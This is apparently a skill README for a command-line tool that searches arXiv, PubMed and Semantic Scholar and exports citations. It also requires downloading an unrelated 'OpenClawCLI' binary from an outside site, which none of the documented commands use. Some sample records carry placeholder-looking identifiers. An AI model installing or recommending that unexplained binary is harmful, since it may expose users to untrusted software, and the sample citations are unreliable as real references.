Academic Research Hub
Search and retrieve academic papers from multiple sources including arXiv, PubMed, Semantic Scholar, and more. Download PDFs, extract citations, generate bibliographies, and build literature reviews.
⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS)
Installation Best Practices:
# Standard installation pip install arxiv scholarly pubmed-parser semanticscholar requests # If you encounter permission errors, use a virtual environment python -m venv venv source venv/bin/activate # On Windows: venv\Scripts\activate pip install arxiv scholarly pubmed-parser semanticscholar requests
Never use --break-system-packages as it can damage your system's Python installation.
Quick Reference
| Task | Command |
|---|---|
| Search arXiv | python scripts/research.py arxiv "quantum computing" |
| Search PubMed | python scripts/research.py pubmed "covid vaccine" |
| Search Semantic Scholar | python scripts/research.py semantic "machine learning" |
| Download papers | python scripts/research.py arxiv "topic" --download |
| Get citations | python scripts/research.py arxiv "topic" --citations |
| Generate bibliography | python scripts/research.py arxiv "topic" --format bibtex |
| Save results | python scripts/research.py arxiv "topic" --output results.json |
Core Features
1. Multi-Source Search
Search across multiple academic databases from a single interface.
Supported Sources:
- •arXiv - Physics, mathematics, computer science, quantitative biology, quantitative finance, statistics
- •PubMed - Biomedical and life sciences literature
- •Semantic Scholar - Computer science and interdisciplinary research
- •Google Scholar - Broad academic search (limited, no API)
2. Paper Download
Download full-text PDFs when available.
python scripts/research.py arxiv "deep learning" --download --output-dir papers/
3. Citation Extraction
Extract and format citations from papers.
Supported formats:
- •BibTeX
- •RIS
- •JSON
- •Plain text
4. Metadata Retrieval
Get comprehensive metadata for each paper:
- •Title, authors, abstract
- •Publication date
- •Journal/conference
- •DOI, arXiv ID, PubMed ID
- •Citation count
- •References
Source-Specific Commands
arXiv Search
Search the arXiv repository for preprints.
# Basic search python scripts/research.py arxiv "quantum computing" # Filter by category python scripts/research.py arxiv "neural networks" --category cs.LG # Filter by date python scripts/research.py arxiv "transformers" --year 2023 # Download papers python scripts/research.py arxiv "attention mechanism" --download --max-results 10
Available categories:
- •
cs.AI- Artificial Intelligence - •
cs.LG- Machine Learning - •
cs.CV- Computer Vision - •
cs.CL- Computation and Language - •
math.CO- Combinatorics - •
physics.optics- Optics - •
q-bio.GN- Genomics - •Full list
Output:
1. Attention Is All You Need Authors: Vaswani et al. Published: 2017-06-12 arXiv ID: 1706.03762 Categories: cs.CL, cs.LG Abstract: The dominant sequence transduction models... PDF: http://arxiv.org/pdf/1706.03762v5
PubMed Search
Search biomedical literature indexed in PubMed.
# Basic search python scripts/research.py pubmed "cancer immunotherapy" # Filter by date range python scripts/research.py pubmed "CRISPR" --start-date 2023-01-01 --end-date 2023-12-31 # Filter by publication type python scripts/research.py pubmed "covid vaccine" --publication-type "Clinical Trial" # Get full text links python scripts/research.py pubmed "gene therapy" --full-text
Publication types:
- •Clinical Trial
- •Meta-Analysis
- •Review
- •Systematic Review
- •Randomized Controlled Trial
Output:
1. mRNA vaccine effectiveness against COVID-19 Authors: Smith J, Jones K, et al. Journal: New England Journal of Medicine Published: 2023-03-15 PMID: 36913851 DOI: 10.1056/NEJMoa2301234 Abstract: Background: mRNA vaccines have shown... Full Text: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9876543/
Semantic Scholar Search
Search computer science and interdisciplinary research.
# Basic search python scripts/research.py semantic "reinforcement learning" # Filter by year python scripts/research.py semantic "graph neural networks" --year 2022 # Get highly cited papers python scripts/research.py semantic "transformers" --min-citations 100 # Include references python scripts/research.py semantic "BERT" --include-references
Output includes:
- •Citation count
- •Influential citation count
- •Reference list
- •Citing papers
- •Fields of study
Output:
1. BERT: Pre-training of Deep Bidirectional Transformers Authors: Devlin J, Chang MW, Lee K, Toutanova K Published: 2019 Paper ID: df2b0e26d0599ce3e70df8a9da02e51594e0e992 Citations: 15000+ Influential Citations: 2000+ Fields: Computer Science, Linguistics Abstract: We introduce a new language representation model... PDF: https://arxiv.org/pdf/1810.04805.pdf
Essential Options
Result Limits
Control the number of results returned.
--max-results N # Default: 10, range: 1-100
Examples:
python scripts/research.py arxiv "machine learning" --max-results 5 python scripts/research.py pubmed "diabetes" --max-results 50
Output Formats
Choose how results are formatted.
--format <text|json|bibtex|ris|markdown>
Text - Human-readable format (default)
python scripts/research.py arxiv "quantum" --format text
JSON - Structured data for processing
python scripts/research.py arxiv "quantum" --format json
BibTeX - For LaTeX documents
python scripts/research.py arxiv "quantum" --format bibtex
RIS - For reference managers (Zotero, Mendeley)
python scripts/research.py arxiv "quantum" --format ris
Markdown - For documentation
python scripts/research.py arxiv "quantum" --format markdown
Save to File
Save results to a file.
--output <filepath>
Examples:
python scripts/research.py arxiv "AI" --output results.txt python scripts/research.py pubmed "cancer" --format json --output papers.json python scripts/research.py semantic "NLP" --format bibtex --output references.bib
Download Papers
Download full-text PDFs when available.
--download --output-dir <directory> # Where to save PDFs (default: downloads/)
Examples:
# Download to default directory python scripts/research.py arxiv "deep learning" --download --max-results 5 # Download to specific directory python scripts/research.py arxiv "transformers" --download --output-dir papers/nlp/
Advanced Features
Citation Extraction
Extract citations from papers.
--citations # Extract citations --citation-format <format> # bibtex, ris, json (default: bibtex)
Example:
python scripts/research.py arxiv "attention mechanism" --citations --citation-format bibtex --output citations.bib
Date Filtering
Filter by publication date.
arXiv:
--year <YYYY> # Specific year --start-date <YYYY-MM-DD> --end-date <YYYY-MM-DD>
PubMed:
--start-date <YYYY-MM-DD> --end-date <YYYY-MM-DD>
Examples:
python scripts/research.py arxiv "quantum" --year 2023 python scripts/research.py pubmed "vaccine" --start-date 2022-01-01 --end-date 2023-12-31
Author Search
Search for papers by specific authors.
--author "Last, First"
Examples:
python scripts/research.py arxiv "neural networks" --author "Hinton, Geoffrey" python scripts/research.py semantic "deep learning" --author "Bengio, Yoshua"
Sort Options
Sort results by different criteria.
--sort-by <relevance|date|citations>
Examples:
python scripts/research.py arxiv "machine learning" --sort-by date python scripts/research.py semantic "NLP" --sort-by citations
Common Workflows
Literature Review
Gather papers on a topic for a literature review.
# Step 1: Search multiple sources python scripts/research.py arxiv "graph neural networks" --max-results 20 --format json --output arxiv_gnn.json python scripts/research.py semantic "graph neural networks" --max-results 20 --format json --output semantic_gnn.json # Step 2: Download key papers python scripts/research.py arxiv "graph neural networks" --download --max-results 10 --output-dir papers/gnn/ # Step 3: Generate bibliography python scripts/research.py arxiv "graph neural networks" --max-results 20 --format bibtex --output gnn_references.bib
Finding Recent Research
Track the latest papers in a field.
# Last year's papers python scripts/research.py arxiv "large language models" --year 2023 --sort-by date --max-results 30 # Last month's biomedical papers python scripts/research.py pubmed "gene therapy" --start-date 2023-11-01 --end-date 2023-11-30 --format markdown --output recent_gene_therapy.md
Highly Cited Papers
Find influential papers in a field.
python scripts/research.py semantic "reinforcement learning" --min-citations 500 --sort-by citations --max-results 25
Author Publication History
Track an author's work.
python scripts/research.py arxiv "deep learning" --author "LeCun, Yann" --sort-by date --max-results 50 --output lecun_papers.json
Building a Reference Library
Create a comprehensive reference collection.
# Create directory structure
mkdir -p references/{papers,citations}
# Search and download papers
python scripts/research.py arxiv "transformers NLP" --download --max-results 15 --output-dir references/papers/
# Generate citations
python scripts/research.py arxiv "transformers NLP" --max-results 15 --format bibtex --output references/citations/transformers.bib
Cross-Source Validation
Verify findings across multiple databases.
# Search same topic across sources python scripts/research.py arxiv "federated learning" --max-results 10 --output arxiv_fl.txt python scripts/research.py semantic "federated learning" --max-results 10 --output semantic_fl.txt python scripts/research.py pubmed "federated learning" --max-results 10 --output pubmed_fl.txt # Compare results diff arxiv_fl.txt semantic_fl.txt
Output Format Examples
Text Format (Default)
Search Results: 3 papers found 1. Attention Is All You Need Authors: Vaswani, Ashish; Shazeer, Noam; Parmar, Niki; et al. Published: 2017-06-12 arXiv ID: 1706.03762 Categories: cs.CL, cs.LG Abstract: The dominant sequence transduction models are based on complex recurrent or convolutional neural networks... PDF: http://arxiv.org/pdf/1706.03762v5 2. BERT: Pre-training of Deep Bidirectional Transformers Authors: Devlin, Jacob; Chang, Ming-Wei; Lee, Kenton; Toutanova, Kristina Published: 2018-10-11 arXiv ID: 1810.04805 Categories: cs.CL Abstract: We introduce a new language representation model called BERT... PDF: http://arxiv.org/pdf/1810.04805v2
JSON Format
[
{
"title": "Attention Is All You Need",
"authors": ["Vaswani, Ashish", "Shazeer, Noam", "Parmar, Niki"],
"published": "2017-06-12",
"arxiv_id": "1706.03762",
"categories": ["cs.CL", "cs.LG"],
"abstract": "The dominant sequence transduction models...",
"pdf_url": "http://arxiv.org/pdf/1706.03762v5",
"doi": "10.48550/arXiv.1706.03762"
}
]
BibTeX Format
@article{vaswani2017attention,
title={Attention Is All You Need},
author={Vaswani, Ashish and Shazeer, Noam and Parmar, Niki and Uszkoreit, Jakob and Jones, Llion and Gomez, Aidan N and Kaiser, {\L}ukasz and Polosukhin, Illia},
journal={arXiv preprint arXiv:1706.03762},
year={2017},
url={http://arxiv.org/abs/1706.03762}
}
RIS Format
TY - JOUR TI - Attention Is All You Need AU - Vaswani, Ashish AU - Shazeer, Noam AU - Parmar, Niki PY - 2017 DA - 2017/06/12 JO - arXiv preprint VL - arXiv:1706.03762 UR - http://arxiv.org/abs/1706.03762 ER -
Markdown Format
# Search Results: 3 papers found ## 1. Attention Is All You Need **Authors:** Vaswani, Ashish; Shazeer, Noam; Parmar, Niki; et al. **Published:** 2017-06-12 **arXiv ID:** 1706.03762 **Categories:** cs.CL, cs.LG **Abstract:** The dominant sequence transduction models are based on complex recurrent or convolutional neural networks... **PDF:** [Download](http://arxiv.org/pdf/1706.03762v5)
Best Practices
Search Strategy
- •Start broad - Use general terms to get an overview
- •Refine iteratively - Add filters based on initial results
- •Use multiple sources - Cross-reference findings
- •Check recent papers - Use date filters for current research
Result Management
- •Save searches - Use
--outputto preserve results - •Organize downloads - Create logical directory structures
- •Export citations early - Generate BibTeX as you search
- •Track sources - Note which database returned which papers
Download Guidelines
- •Respect rate limits - Don't download hundreds of papers at once
- •Check licensing - Verify you have rights to use papers
- •Organize by topic - Use clear directory names
- •Keep metadata - Save JSON alongside PDFs
Citation Practices
- •Verify citations - Check DOIs and URLs
- •Use standard formats - BibTeX for LaTeX, RIS for reference managers
- •Include abstracts - Helpful for later review
- •Update regularly - Re-run searches for new papers
Troubleshooting
Installation Issues
"Missing required dependency"
# Install all dependencies pip install arxiv scholarly pubmed-parser semanticscholar requests # Or use virtual environment python -m venv venv source venv/bin/activate # On Windows: venv\Scripts\activate pip install arxiv scholarly pubmed-parser semanticscholar requests
"OpenClawCLI not found"
- •Download from https://clawhub.ai/
- •Install for your OS (Windows/MacOS)
Search Issues
"No results found"
- •Try broader search terms
- •Check spelling and terminology
- •Remove restrictive filters
- •Try a different database
"Rate limit exceeded"
- •Wait a few minutes before retrying
- •Reduce
--max-resultsvalue - •Space out requests
"Download failed"
- •Check internet connection
- •Some papers may not have PDFs available
- •Verify you have permissions to access
- •Try downloading individually
API Issues
"API timeout"
- •The service may be temporarily unavailable
- •Retry after a moment
- •Check status at respective service websites
"Invalid API response"
- •Check if the service is down
- •Verify your query syntax
- •Try simpler queries
Limitations
Access Restrictions
- •Not all papers have downloadable PDFs
- •Some content requires institutional access
- •Paywalled journals may only show abstracts
- •Google Scholar has strict rate limits
Data Completeness
- •Citation counts may be outdated
- •Not all metadata fields available for every paper
- •Some older papers may have incomplete records
- •Preprints may not have final publication info
Search Capabilities
- •Boolean operators vary by source
- •No unified query syntax across databases
- •Some databases don't support all filters
- •Results may differ from web interface searches
Legal Considerations
- •Respect copyright and licensing
- •Don't redistribute downloaded papers
- •Follow institutional access policies
- •Check terms of service for each database
Command Reference
python scripts/research.py <source> "<query>" [OPTIONS] SOURCES: arxiv Search arXiv repository pubmed Search PubMed database semantic Search Semantic Scholar REQUIRED: query Search query string (in quotes) GENERAL OPTIONS: -n, --max-results Maximum results (default: 10, max: 100) -f, --format Output format (text|json|bibtex|ris|markdown) -o, --output Save to file path --sort-by Sort by (relevance|date|citations) FILTERING: --year Filter by specific year (YYYY) --start-date Start date (YYYY-MM-DD) --end-date End date (YYYY-MM-DD) --author Author name --min-citations Minimum citation count ARXIV-SPECIFIC: --category arXiv category (e.g., cs.AI, cs.LG) PUBMED-SPECIFIC: --publication-type Publication type filter --full-text Include full text links SEMANTIC-SPECIFIC: --include-references Include paper references DOWNLOAD: --download Download paper PDFs --output-dir Download directory (default: downloads/) CITATIONS: --citations Extract citations --citation-format Citation format (bibtex|ris|json) HELP: --help Show all options
Examples by Use Case
Quick Search
# Find recent papers python scripts/research.py arxiv "quantum computing" # Search biomedical literature python scripts/research.py pubmed "alzheimer disease"
Comprehensive Research
# Search multiple sources python scripts/research.py arxiv "neural networks" --max-results 30 --output arxiv.json python scripts/research.py semantic "neural networks" --max-results 30 --output semantic.json # Download important papers python scripts/research.py arxiv "neural networks" --download --max-results 10
Citation Management
# Generate BibTeX python scripts/research.py arxiv "deep learning" --format bibtex --output dl_refs.bib # Export to reference manager python scripts/research.py pubmed "gene editing" --format ris --output genes.ris
Tracking New Research
# This month's papers python scripts/research.py arxiv "LLM" --start-date 2024-01-01 --sort-by date # Recent highly-cited work python scripts/research.py semantic "transformers" --year 2023 --min-citations 50
Support
For issues or questions:
- •Check this documentation
- •Run
python scripts/research.py --help - •Verify dependencies are installed
- •Check database-specific documentation
Resources:
- •OpenClawCLI: https://clawhub.ai/
- •arXiv API: https://arxiv.org/help/api
- •PubMed API: https://www.ncbi.nlm.nih.gov/books/NBK25501/
- •Semantic Scholar API: https://api.semanticscholar.org/